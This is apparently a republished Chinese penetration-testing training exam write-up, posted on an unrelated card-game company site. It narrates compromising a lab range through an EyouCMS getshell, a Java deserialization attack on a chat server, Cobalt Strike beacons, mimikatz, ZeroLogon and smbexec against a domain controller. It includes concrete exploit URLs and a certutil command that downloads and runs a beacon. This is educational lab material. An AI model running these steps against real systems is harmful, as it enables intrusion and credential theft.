• 首页
  • 关于欢乐棋牌
  • 欢乐棋牌新闻
  • 客户案例
  • 招商加盟
  • 联系我们
  • 公司资讯
  • 行业资讯
  • 技术百科

    • 暗月渗透测试十月份考核文章第四篇

    公司资讯 admin 发布时间:2024-08-23 浏览:0 次

    暗月渗透测试十月份考核文章第四篇

    0考核介绍

    本次考核最终通过人数七人 达到预期目标

    考核内容 

    本次考核使用在线靶靶场,主要考核从外网打点到内网域渗透的能力。

    web:php代码审计 、java反序列化漏洞利用等。

    内网:隧道应用、横向渗透、域渗透等 。

    难度 中

    拓扑图:

    10x01 渗透过程

    访问站点,发现是EyouCms

    通过百度搜索,发现eyoucms1.5.2版本存在前台getshell

    参考文章如下

    https://www.cnblogs.com/1jzz/p/15489724.html

    https://www.yisu.com/zixun/497673.html

    利用脚本获取PHPSESSID(来自https://www.yisu.com/zixun/497673.html)

    替换cookie进入后台

    远程下载插件(也是取巧来自https://www.yisu.com/zixun/497673.html)

    http://216.224.123.190/login.php?m=admin&c=weapp&a=downloadInstall&url=https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg

    访问webshell

    http://216.224.123.190/uploads/allimg/news_2021.php

    连接蚁剑

    上传哥斯拉的马,方便下一步上传大文件

    通过哥斯拉执行上传的exe上线,从桌面翻到qqClient.jar,账号.txt。并从账号.txt获取到2个账号。

    通过反编译jar包,发现下一个靶机信息

    通过在github上搜索qqClient.jar,发现一个与源码极为相似的项目,而且同时存在server端的代码

    通过审计服务端发现两处反序列化点

    第一处qqserver.java

    第二处ServerConnectClientThread.java

    因为有过提示User类不是漏洞点,那就只有Message类了,去客户端寻找那些地方使用了wireObject(message)方法

    随便在上面四个找了一个点,sendMessageToAll

    就是在向所有人发送消息时,会触发序列化。首先利用URLDNS链来探测。

    服务端取一个debug断点

    客户端启动,,账户密码是被后端写死的

    输入账号密码后选择向全部人发送消息触发客户端序列化

    访问dnslog成功

    URLDNS之后应该就是CC链了,给客户端与服务端同时添加commons-collections-3.2.1.jar作为依赖包。并生成CC链恶意对象,步骤与测试URLDNS相同。

    选取CC6Gaget作为恶意对象

    cc6参考文章:

    https://www.yuque.com/yang99/take9g/fqaw5x

    几乎可以完全复制

    只需修改calc命令为你要执行的命令就行

    然后根据第一台靶机QQclient.jar的反编译信息新建一个项目并添加commons-collections-3.2.1.jar作为依赖包,在sendMessageToAll中添加cc6恶意对象。

    powershell上线并未成功,不过利用nc工具,确定了利用方式是正确的

    利用已有的外网中转上线,创建listener

    生成beacon123.exe,并放在第一台服务的web根目录下

    通过远程下载(替换calc),分别执行以下命令。

    certutil -urlcache -split -f http://192.168.22.152/beacon123.exe  beacon123.exe

    beacon123.exe

    上线第一台不出网机器

    后面就是域控了,首先确定域控的名字,就是AD

    在第二台机器上mimikatz并没有抓到域控或者域用户的密码,

    尝试CVE-2020-1472-ZeroLogon漏洞

    mimikatz进行测试,发现存在漏洞

    利用mimikatz读取administratorhash

    利用第二台机器开启socks代理并结合Proxifier

    smbexec.exe获取adshell

    最后是ad上线cs

    第一步:ad开启共享netshare

    第二步:第二台机器作为中转机器生成ad.exe,并通过第二台机器ipc连接域控并上传exe

    第三步:通过smbexec.exe获取的adshell执行ad.exe

    至此,所有机器都上线cs

    2关注公众号

    公众号长期更新安全类文章,关注公众号,以便下次轻松查阅

    觉得文章对你有帮助 请转发 点赞 收藏

    3关于培训

    需要渗透测试培训

    扫一扫添加微信咨询

    课程内容点击了解

    暗月渗透测试课程更新

    相关推荐
    关于欢乐棋牌
    公司简介 企业文化
    欢乐棋牌新闻
    公司资讯 行业资讯 技术百科
    客户案例
    企业官网 新闻门户 商城网站
    联系我们

    电话:400-888-8888

    QQ:88888888

    微信:wx888


    友情链接: 欢乐棋牌

    苏ICP12345678 XML地图

    Copyright © 2024 欢乐棋牌 本站资源来源于互联网

    在线咨询

    点击这里给我发消息售前咨询专员

    点击这里给我发消息售后服务专员

    在线咨询

    免费通话

    24h咨询:400-888-8888


    如您有问题,可以咨询我们的24H咨询电话!

    免费通话

    微信扫一扫

    微信联系
    返回顶部